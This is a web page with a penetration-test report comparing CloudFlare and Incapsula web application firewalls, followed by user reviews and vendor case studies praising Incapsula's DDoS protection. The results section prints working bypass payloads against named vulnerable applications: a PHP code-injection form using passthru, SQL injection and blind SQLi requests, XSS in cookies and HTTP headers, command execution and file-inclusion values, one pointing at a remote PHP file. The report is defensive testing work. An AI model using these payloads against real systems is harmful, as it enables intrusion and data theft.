      Obviously a key evaluation criteria for a WAF is to be able to block as many attack variants as possible. However, in real life scenarios there is another evaluation criteria that is as important – not blocking legitimate users.

      Testing for false positives is not a trivial task and the way we have decided to run this test is to simulate an administrator that is updating the application HTML. You would find this action in any CMS and it is specifically prone to false positives in XSS filters that look for suspicious HTML and Javascript code.

      From our tests it seems that Incapsula has a mechanism to detect what CMS is installed on the web server and to automatically detect and whitelist legitimate administrative actions.

      On the other hand CloudFlare’s aggressive XSS filter blocked legitimate attempts to upload HTML and Javascript code to the application through the CMS built in functions.

      Conclusion
      From the results table, we can see that Incapsula's WAF continues to have an advantage over CloudFlare's WAF. We should also mention that only Incapsula's WAF is PCI-Certified, which is an advantage for certain types of online businesses.

      While CloudFlare's new WAF solution showed substantial improvement since the first penetration test, it still does not provide the comprehensive level of security against certain types of web application attacks (e.g., SQL injection, Remote File Inclusion) that many online businesses today require.

      We noticed the high block ratio of XSS attacks, but from all the types of attacks, main focus was on Cross-Site Scripting. The SQL Injection, Local and Remote File Inclusion, and Remote Code/Command Execution attacks had very low detection rate by the CloudFlare WAF.

      Incapsula, on the other hand, has shown consistent security performance in both tests, with a high block ratio and few false-positives.

      Intro
      Both Incapsula and CloudFlare WAF services have improved their protection mechanisms and detection methodologies since the previous evaluation. That being said, we decided to put them on yet another heavy test and see what filters we can evade/bypass. All the settings were set to maximum level of protection in both testing environments.

      This time we used several real-world applications vulnerable to different types of attack vectors to simulate a real hacking scenario against the firewall services of both vendors.

      Along with the vulnerable applications, we used an improved PoC script file to test the solutions against generic attack vectors and their learning mechanisms. This script was written by us and it basically allows calling unsanitized input from the users which allowed us to exploit it and manipulate the results in several ways which would confirm 100% whether or not the filter was indeed working as expected.

      Setup and configuration
      We're not going in details on how to setup CloudFlare and Incapsula services. Refer to the previous report for more details. All we can say here is that the infrastructure design has remained the same which is the WAF sitting in front of the dedicated server, intercepting all requests that are destined for it. The setup process from client's perspective has stayed the same as well. We've set everything to 'ON' and 'HIGH' for both WAF options.

      CloudFlare WAF Settings

      Incapsula WAF Settings

      Targets and tools
      For this occasion we've created two separate testbeds on separate server host machines.

      - CloudFlare - cf.destr0y.net

      - Incapsula - in.zeroscience.mk, inc.zeroscience.mk, inc.destr0y.net, 4sylum.elgringodelanoche.com

      The testbed servers were running Apache web server with PHP and MySQL DBMS. Both the servers had the 'poc.php' script deployed, which is vulnerable to Cross-Site Scripting, SQL Injection, Local and Remote File Inclusion, Cookie Poisoning and Command Execution attacks. We also installed several real-world web applications that are vulnerable to different attack vectors.

      Practico CMS 13.7 Auth Bypass SQL Injection - by shiZheni (https://www.exploit-db.com/exploits/28129)
      Practico CMS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'uid' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

      WP NOSpamPTI Plugin Blind SQL Injection - by Alexandro Silva (https://www.exploit-db.com/exploits/28485)
      NOSpamPTI contains a flaw that may allow an attacker to carry out a Blind SQL injection attack. The issue is due to the wp- comments-post.php script not properly sanitizing the comment_post_ID in POST data. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

      WP TimThumb Plugin Remote Code Execution - by Mark Maunder (https://www.exploit-db.com/exploits/17602)
      TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.

      WP W3 Total Cache Plugin PHP Code Execution - by Unknown (https://osvdb.org/show/osvdb/92652) W3 Total Cache Plugin for WordPress contains a flaw that is due to the program failing to properly restrict access to the mclude
      and mfunc PHP code inclusion macros. This may allow a remote attacker to insert and execute arbitrary PHP code.

      webgrind 1.0 Local File Inclusion Vulnerability - by Michael Meyer (https://www.exploit-db.com/exploits/18523)
      webgrind suffers from a file inclusion vulnerability (LFI) when input passed thru the 'file' parameter to index.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

      Newsletter Tailor 0.2.0 Remote File Inclusion - by Snakespc (https://www.exploit-db.com/exploits/11378)
      Newsletter Tailor contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the index.php script not properly sanitizing user input supplied to the 'p' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

      Apache Struts <2.2.0 Command Execution - by Meder Kydyraliev (https://www.exploit-db.com/exploits/14360)
      Apache Struts versions < 2.2.0 suffers from a remote command execution vulnerability. This issue is caused by a failure to properly handle unicode characters in OGNL extensive expressions passed to the web server. By sending a specially crafted request to the Struts application it is possible to bypass the "#" restriction on ParameterInterceptors by using OGNL context variables. Bypassing this restriction allows for the execution of arbitrary Java code.

      Apache Struts includeParams RCE < 2.3.14.2 - by Eric K., Douglas R. (https://www.osvdb.org/show/osvdb/93645)
      Apache Struts contains a flaw that may allow an attacker to execute arbitrary commands. The issue is due to the handling of the includeParams attribute in the URL and Anchor tags. With a specially crafted request parameter, an attacker could inject arbitrary OGNL code that would be evaluated. In addition, a second evaluation of attacker supplied input can occur when the URL or Anchor tag tries to resolve arbitrary parameters, that would be evaluated as an OGNL expression.

      Apache Struts < 2.2.3 Multiple RCE - by Takeshi Terada (https://www.securityfocus.com/bid/61189) Apache Struts is prone to multiple remote command-execution vulnerabilities. Successful exploits will allow remote attackers to
      execute arbitrary commands within the context of the affected application.

      GLPI < 0.84.1 Arbitrary PHP Code Injection - by High-Tech Bridge SA (https://www.exploit-db.com/exploits/28685)
      GLPI suffers from an insufficient validation of user-supplied input passed to the "db_host", "db_user", "db_pass", and "databasename" HTTP POST parameters via "/install/install.php" script [that is present by default after application installation] before writing data into "/config_db.php" file. A remote attacker can inject and execute arbitrary PHP code on the vulnerable system.

      Joomla CMS 3.1.5, WordPress 3.6.1 and phpMyAdmin 4.0.8 - False Positives Front

      99% of the test was manually approached, but we used several tools for fuzzing and automation to see how the WAFs will behave on scanners and session tracking.

      Tools used:

      • Acunetix Web Vulnerability Scanner
      • Havij SQL Injection Tool
      • Burp Suite
      • OWASP Zed Attack Proxy (ZAP)
      • TamperData
      • Firebug
      • Cookies Manager+
      • CookieMonster
      • HttpFox
      • Live HTTP Headers
      • tcpdump
      • Wireshark
      • Metasploit Framework

      We used the following browsers:

      • Mozilla Firefox
      • Microsoft Internet Explorer
      • Google Chrome
      • Opera
      • Apple Safari
      • Iceweasel

      Contents of poc.php:

      (click to enlarge)

      Testing and analysis
      From previous report, Incapsula patched the bypasses and has improved their WAF and even included a new separate control for RFI attacks.

      CloudFlare having in mind our previous results has introduced a much improved WAF based on OWASP Core Rule Set (ModSecurity). However, there are lots of bypasses present in the newly upgraded WAF solution. We noticed only a few false positives in CloudFlare while doing regular tasks, using a legitimate application from regular user's perspective. Given the fact that the False Positives test was executed using phpMyAdmin, this was more than expected.

      Incapsula on the other hand had also a few false positives, including simple Joomla administrator actions. Unlike Cloudflare, Incapsula offers a great option for whitelisting the request URL and the affected parameter, which allows the WAF administrator to resolve incidents of this kind at any time.

      What’s also important to note is that Incapsula can recognize an ongoing attack and block attacker's session. We specifically noticed this during the test using automated tools such as ZAP and Burp. Their blocking mechanism seems to be based on recognizing the fingerprint of the tool being used, so even if you try to trick it by changing the default User-Agent or manipulating other header fields, the WAF will still block your session. We didn't notice such mechanism on CloudFlare's WAF. CloudFlare blocks a session only if an attacker tries to manipulate and send invalid headers.

      XSS vectors:

      - Vectors making use of HTML5 features

      - Vectors working on HTML4 and older versions

      - Cascading stylesheet injection based vectors

      - Plain JavaScript vectors

      - E4X vectors working on gecko based browsers

      - Vectors attacking DOM properties and methods

      - JSON based vectors

      - Vectors embedded in SVG files

      - Vectors related to X(HT)ML

      - UTF7 and other exotic charset based vectors

      - Client side denial of service vectors

      - HTML behavior and binding vectors

      - Clickjacking and UI Redressing vectors

      Results (CloudFlare):


      Webgrind Local File Inclusion Bypass:
      https://cf.destr0y.net/webgrind/index.php?file=/etc...

      GLPI SQL Injection and Remote Code Execution Bypass:

      <form action="https://cf.destr0y.net/glpi/install/install.php" method="post" name="main"> <input type="hidden" name="install" value="update_1"> <input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*"> <input type="submit" id="btn"> </form> <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-008.png" width="650"> </p>

      https://cf.destr0y.net/glpi/index.php?cmd=ls%20-la;...

      Newsletter Tailor Remote File Inclusion Bypass:
      https://cf.destr0y.net/list/admin/index.php?p=http:...

      https://cf.destr0y.net/list/admin/index.php?p=http:...

      Practico SQL Injection Authentication Bypass:

      POST /practico/ HTTP/1.1 Host: cf.destr0y.net Content-Type: application/x-www-form-urlencoded Content-Length: 73 Connection: keep-alive Accept-Encoding: gzip, deflate accion=Iniciar_login&uid=admin%27+AND+1%3D1%23&clave=password&captcha=vhw3 <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-012.jpg" width="650"> </p>

      TimThumb Remote File Include Bypass:
      https://cf.destr0y.net/wp/wp- content/plugins/timthumb/cache/external_3ad96be987d746db968ebaa77c49900e.php

      WP Plugin NoSpamPTI Blind SQL Injection Bypass:

      <form novalidate="" id="commentform" method="post" action="https://cf.destr0y.net/wp/wp-comments-post.php"> <input type="submit" value="Post Comment" id="submit" name="submit"> <input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID"><br> <input type="hidden" value="0" id="comment_parent" name="comment_parent"> </form> <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-014.jpg" width="650"> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-015.png" width="650"> </p>

      Cookie Poisoning Bypass (XSS, SQLi, RFI, LFI, CMDexec):

      CloudFlare doesn't check the Cookie value or any other HTTP header field (except User-Agent) for malicious strings. To prove this, we successfully managed to exploit the cookie vulnerabilities in the PoC script.

      Cookie XSS Bypass:

      Cookie value: hallo=J0xy0L </h2><script>alert(document.cookie)</script>

      Cookie CMDExec Bypass:

      Cookie value: market=uname -a;

      Cookie LFI/RFI Bypass:
      Cookie value: segment=https://zeroscience.mk/pentest/tim.php

      Cookie SQLi Bypass:
      Cookie value: notifications=dasdsa' union select* from testwaf;#

      Directory Traversal Bypass using Burp:

      Apache Struts Block (msf):

      SQL Injection Fuzz (ZAP) Block:

      WP W3 Total Cache Plugin PHP Code Execution Block:

      <textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>

      User-Agent HTTP Header Field XSS Block:
      UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(1);</script>

      False Positive (phpMyAdmin):
      https://cf.destr0y.net/phpma/querywindow.php?token=... &table=testwaf&sql_query=SELECT%20*%20FROM%20%60testwaf%60%20WHERE%20%60testzsl%60%3D1&init=1 (?)

      Unlike Incapsula, CloudFlare does not offer an option to whitelist the requests and parameters but rather whitelist the IP of the user.

      Results (Incapsula):

      Webgrind Local File Inclusion Bypass:

      Seems its configured to detect and trigger on hardcoded values (I.E: /etc/hosts, /etc/passwd). The vulnerability can still be used to read other valuable files on the system. For example:
      https://in.zeroscience.mk/webgrind/index.php?op=fil...

      GLPI SQL Injection and Remote Code Execution Bypass:


      <form action="https://inc.destr0y.net/glpi/install/install.php" method="post" name="main">

      <input type="hidden" name="install" value="update_1">

      <input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*">

      <input type="submit" id="btn">

      </form>

      GLPI SQL Injection and Remote Code Execution Bypass:

      POST /practico/ HTTP/1.1

      Host: 4sylum.elgringodelanoche.com

      Content-Type: application/x-www-form-urlencoded

      accion=Iniciar_login&uid=admin' AND 230984752 = 230984752#&clave=admin&captcha=rxbg

      Accept-Encoding HTTP Header Field XSS Bypass:
      AE value: gzip, deflate"><script>alert(1);</script>

      User-Agent HTTP Header Field XSS Bypass:
      UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(document.cookie)</script>

      Remote File Include Bypass (questionable (captcha)):

      Apache Struts Block (tcpdump):

      Cross-Site Scripting Bypass:

      Cross-Site Scripting Bypass:
      https://inc.zeroscience.mk/poc.php?x=%3Cform%20id=t... %3Cbutton%20form=test%20onformchange=alert(/XSS/)%3EX%3C/button%3E

      XSS Fuzz (Burp) Block:

      WP Plugin NoSpamPTI Blind SQL Injection Block:

      <form novalidate="" id="commentform" method="post" action="https://in.zeroscience.mk/wp/wp-comments-post.php"> <input type="submit" value="Post Comment" id="submit" name="submit"> <input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID"> <input type="hidden" value="0" id="comment_parent" name="comment_parent"> </form>

      Newsletter Tailor Remote File Inclusion Block:
      https://in.zeroscience.mk/list/admin/index.php?p=ht...

      TimThumb Remote File Include Block:
      https://in.zeroscience.mk/wp/wp- content/plugins/timthumb/timthumb.php?src=https://zeroscience.mk/pentest/tim.php.php

      WP W3 Total Cache Plugin PHP Code Execution Block:

      <textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>

      False Positive (Joomla):

      Due to suspicious values being hardcoded as even triggers, Incapsula blocks legitimate access to applications with those keywords in the content/paylod.

      For example, any comments in blogs or web content containing any of these keywords will cause Incapsula to deny access. As an example, any IT helpdesk blog with content containing strings such as /etc/passwd, /etc/hosts.

      Access denied was presented to us when saving the global configuration in Joomla CMS because of the POST parameter 'jform[sendmail]' with value: /usr/sbin/sendmail...also when tried to install any extension we get blocked, but we can add the parameter and the request URL to the whitelist excluding this particular false positive.

      POST https://in.zeroscience.mk/joomla/administrator/ind... HTTP/1.1 - jform[sendmail]=/usr/sbin/sendmail

      POST https://in.zeroscience.mk/joomla/administrator/ind... - joomla extension install (RFI FP)

      Afterthoughts

      We can conclude and confirm that both solutions have improved over the course of this year. And that’s really good to see. Incapsula has invested more into blocking real life attacks on real apps. Their session blocks works pretty good against automated attacks but it didn’t block our sessions while doing the manual testing. They might want to put some more effort into that.

      CloudFlare has made a big step forward by introducing a new WAF solution knowing that in the previous result they were rock bottom and basically didn’t stop any attacks. Their new solution is fine but they still have lots of work to do and put it on Incapsula level.

      We also noticed that CloudFlare has a high protection rate for XSS attacks than SQLi and LFI/RFI combined.

      As we’ve shown in the Results part, both Incapsula and CloudFlare, don’t block malicious request with values sent in HTTP Headers. This leaves an open door for attacker to exploit vulnerabilities of such kind. We specifically tested this with Cookie XSS, LFI, RFI, CMD Execution vulnerabilities in the PoC script. Here is a list of few public cookie poisoning vulnerabilities to show the real life relevance of this issue:

      For References and Appendix see: https://zeroscience.mk/files/wafreport2013v2.pdf

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      CEO at a tech services company with 51-200 employees
      Consultant
      ​We use Incapsula for some of our sites and the experience has been excellent
      We use Incapsula for some of our sites and the experience has been excellent. You would not even know it was there – unlike those caching plugins (admittedly they are for speed not for security) – which remind you constantly that they are there so much so that you have to turn them off. Whoops.

      We use Incapsula for some of our sites and the experience has been excellent. You would not even know it was there – unlike those caching plugins (admittedly they are for speed not for security) – which remind you constantly that they are there so much so that you have to turn them off. Whoops.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user67500
      Developer with 51-200 employees
      Vendor
      We Use Incapsula's DDoS Protection Service to Maximize Availability and Performance
      In September 2013, our online store was the victim of a prolonged three-week application-level DDoS attack. Mitigating this type of Layer 7 DDoS attack is a major challenge for security solutions, since malicious bot traffic often appears to be requests from legitimate users. During this attack, our existing anti-DDoS solution was not able to effectively filter out the malicious traffic, which meant that innocent e-commerce customers were blocked from accessing the sites or were forced to unnecessarily fill out CAPTCHA challenges. As an e-commerce company, website security is central to our core business. We needed a DDoS protection solution that would enable us to maintain "business as usual" even under attack, with minimum disruption to the user experience. Minimizing false positives was…

      In September 2013, our online store was the victim of a prolonged three-week application-level DDoS attack. Mitigating this type of Layer 7 DDoS attack is a major challenge for security solutions, since malicious bot traffic often appears to be requests from legitimate users. During this attack, our existing anti-DDoS solution was not able to effectively filter out the malicious traffic, which meant that innocent e-commerce customers were blocked from accessing the sites or were forced to unnecessarily fill out CAPTCHA challenges.

      As an e-commerce company, website security is central to our core business. We needed a DDoS protection solution that would enable us to maintain "business as usual" even under attack, with minimum disruption to the user experience. Minimizing false positives was a crucial requirement, since the easiest way to lose a customer is to block her from accessing the site.

      Realizing that our previous solution was not equipped to handle this type of sophisticated application-level DDoS attack, we sought a DDoS Protection service capable of correctly filtering all types of DDoS attacks from legitimate website traffic, without affecting the online experience for our customers.

      During our search for a new solution, we came across Incapsula and were impressed by industry comparisons such as the one appearing on TopTenReviews.com showing the clear superiority of Incapsula over our existing service in terms of professionalism, performance and security.

      We decided to give Incapsula a try and initially activated their service on our French domain. It quickly became clear to us that Incapsula was the right solution to handle the DDoS attacks that we face. After only six days, we signed a contract and moved our other domains to Incapsula's service as well.

      We are now using Incapsula's always-on DDoS Protection service to secure our online stores against the largest and smartest types of DDoS attacks - including network, protocol and application level (Layers 3, 4 & 7) attacks – with minimal business disruption.

      Incapsula is now a key component of our security infrastructure. When under DDoS, traffic is routed through Incapsula for screening, where malicious traffic and DDOS attacks are blocked automatically.

      By using Incapsula's DDoS Protection, we have achieved concrete benefits:

      • Intelligent mitigation of sophisticated application layer attacks - Incapsula uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
      • Transparent mitigation with less than 0.1% False Positives - Incapsula applies a set of progressive and non-intrusive challenges that are designed to ensure the optimal balance between strong DDoS protection and an uninterrupted user experience, without the need for annoying delay and CAPTCHA screens.
      • "Always on" DDoS protection - Automatic "always on" DDoS mitigation and 24x7 monitoring are effective in stopping "hit & run" DDoS attacks can wreak havoc with solutions that need to be manually turned on and off on every burst.
      • Cloud-based mitigation of network DDoS attacks - Incapsula mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
      • Dedicated NOC team – An experienced team of Network Operations Center (SOC) engineers performs 24x7 security monitoring and assists with DDoS mitigation as needed.

      Since activating Incapsula on our sites, we have solved our DDoS problem and couldn't be more pleased with our overall website performance and security. Equally important, Incapsula's technical support and commercial teams have been very responsive throughout the initial rollout phase.

      Disclosure: IT Central Station has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
      it_user11574
      CEO with 51-200 employees
      Vendor
      We have gone through paid evaluations of several DDoS mitigation services, but all of them failed to block DDOS attacks
      Our company has recently reached 3.5 million registered users and 200,000 hosted websites. Daily DDoS attacks on our platform resulted in unnecessary and prolonged downtime for the thousands of sites on our network. These attacks included network level (layer 3 & 4) attacks ranging from 2Gbps to 10Gbps with various attack vectors such as UDP attacks but most commonly SYN floods which exploit the TCP three-way handshake to consume the server’s connection resources. The more challenging attacks were the diverse application level (Layer 7) attacks. These attacks seem as if they are originating from legitimate sources, try to mimic human behavior and consume the backend computing resources of the website. We were seeing daily DDOS attacks, sometimes multiple DDOS attacks in parallel on various…

      Our company has recently reached 3.5 million registered users and 200,000 hosted websites. Daily DDoS attacks on our platform resulted in unnecessary and prolonged downtime for the thousands of sites on our network. These attacks included network level (layer 3 & 4) attacks ranging from 2Gbps to 10Gbps with various attack vectors such as UDP attacks but most commonly SYN floods which exploit the TCP three-way handshake to consume the server’s connection resources. The more challenging attacks were the diverse application level (Layer 7) attacks. These attacks seem as if they are originating from legitimate sources, try to mimic human behavior and consume the backend computing resources of the website.

      We were seeing daily DDOS attacks, sometimes multiple DDOS attacks in parallel on various client websites. Since our company is a global hosted community platform and social network, everyone was affected at the same time. We needed to make sure that no attack on any one website could bring other websites down. We have gone through paid evaluations of several DDoS Mitigation services, but all of them failed to block DDOS attacks automatically without serious side effects, as blocking legitimate visitors

      Once we decided to evaluate Incapsula's Cloud-Based DoS protection, Incapsula's team quickly helped us to setup a few of our websites on the service.

      Once we joined Incapsula, they immediately identified that our network was under various types of attacks at almost any given time, both network and application level attacks.

      While the network based attacks were absorbed by Incapsula’s backbone, the application layer attacks were very diverse. Incapsula relied very heavily on their bot detection and progressive DDoS challenge technology, to block 100% of attackers transparently, without incurring any noticeable effect to almost all of the real users.

      Maintaining the best possible customer experience was a key consideration for us. It was very apparent why other DDoS protection services that involve delays, CAPCHAs and other side effect on visitors' would not work for us. Also, a DDoS solution that isn't fully automated, would keep our team constantly busy to enable/disable the protection service.

      Incapsula’s ability to allow human and legitimate bot traffic to access the website with no interruption, while filtering network and application level DDoS traffic, allowed us to put our DDoS problems behind and focus on what we do best, which is building a great platform for the online gamers community.

      Incapsula is now a critical component of our security infrastructure. All traffic to our network and hosted websites passes through Incapsula for screening. Malicious traffic and DDOS attacks are blocked automatically.

      We take advantage of Incapsula's DDoS Protection key benefits, to secure our online properties:

      • Protection against Network and Application Level Attacks- Through a worldwide network of multi-gigabit scrubbing centers and unique bot (automation) detection technology, Incapsula provides complete protection for both network (Layer 3 & 4) and application level (Layer 7) DDoS attacks.
      • 24x7 Managed Security Service- Incapsula’s DDoS security team monitors attacks and is available on-demand before, during or after attacks to ensure that our sites are up and running and performing.
      • vZero Business Disruption- Incapsula’s CDN and bot detection technology ensure that even under attack, our website traffic is accelerated and legitimate visitors are not delayed or denied access to our sites.

      Our network was finally clear from the endless onslaught of crippling UDP & SYN flood attacks that we had been experiencing. Using Incapsula's dashboard, we were able to see exactly when each attack was happening, and continue delivering service to millions of users during the attack. We also saw a sharp drop in unwanted bot activity, which resulted in a 20% drop in load on our servers. A key feature we were looking for is a very low false positive rate during mitigation. Incapsula proved to have a near zero false positive rate, and legitimate users had no trouble accessing our websites during prolonged DDOS attacks.

      Disclosure: IT Central Station has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
      Buyer's Guide
      Download our free Imperva Incapsula Report and get advice and tips from experienced pros sharing their opinions.